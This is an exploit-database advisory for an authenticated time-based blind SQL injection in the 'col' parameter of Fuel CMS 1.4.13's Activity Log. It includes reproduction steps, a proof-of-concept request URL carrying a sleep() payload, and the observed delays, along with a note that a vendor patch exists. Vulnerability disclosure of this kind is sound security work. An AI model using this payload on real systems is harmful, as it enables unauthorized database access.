Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)

vendor:

Fuel CMS

by:

Rahad Chowdhury

8.8

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Fuel CMS

Affected Version From: 1.4.13

Affected Version To: 1.4.13

Patch Exists: YES

Related CWE:

CPE: a:getfuelcms:fuel_cms:1.4.13

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux, PHP 7.4.16, Apache 2.4.46

2021

Fuel CMS 1.4.13 – ‘col’ Blind SQL Injection (Authenticated)

Fuel CMS 1.4.13 is vulnerable to Blind SQL Injection in the 'col' parameter. An attacker can inject malicious SQL queries in the 'col' parameter and can gain access to the database. The exploit can be reproduced by logging into the panel, going to the 'Activity Log' menu, selecting any type option and then injecting a Blind SQL Injection query in the 'col' parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the application to the latest version.

Source

Exploit-DB raw data:

# Exploit Title: Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)
# Date: 2021-04-11
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.13.zip
# Version: 1.4.13
# Tested on: Kali Linux, PHP 7.4.16, Apache 2.4.46

Steps to Reproduce:
1. At first login your panel
2. then go to "Activity Log" menu
3. then select any type option
4. their "col" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "and (select * from(select(sleep(1)))a)" in "col=" parameter.

POC:
http://127.0.0.1/fuel/logs/items?type=debug&search_term=&limit=50&view_type=list&offset=0&order=desc&col=entry_date
and (select * from(select(sleep(1)))a)&fuel_inline=0

Output:
By issuing sleep(0) response will be delayed to 0 seconds.
By issuing sleep(1) response will be delayed to 1 seconds.
By issuing sleep(5) response will be delayed to 5 seconds.
By issuing sleep(10) response will be delayed to 10 seconds